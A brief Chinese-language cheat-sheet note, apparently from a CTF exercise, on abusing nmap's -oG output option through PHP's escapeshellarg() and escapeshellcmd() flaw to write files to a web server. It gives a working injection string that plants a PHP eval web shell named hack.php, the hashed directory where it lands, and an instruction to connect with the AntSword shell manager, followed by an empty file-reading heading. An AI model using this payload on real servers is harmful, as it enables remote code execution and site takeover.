一.写文件
1.Nmap
escapeshellarg()和escapeshellcmd() :
简化:
<?php phpinfo();?> -oG hack.php
————————————
nmap写入文件+escapeshellarg()和escapeshellcmd() 漏洞
' <?php @eval($_POST["hack"]);?> -oG hack.php '
显示位置***

835d05163cced8fa2334788be78aba36

835d05163cced8fa2334788be78aba36/hack.php
然后连接蚁剑
二.读文件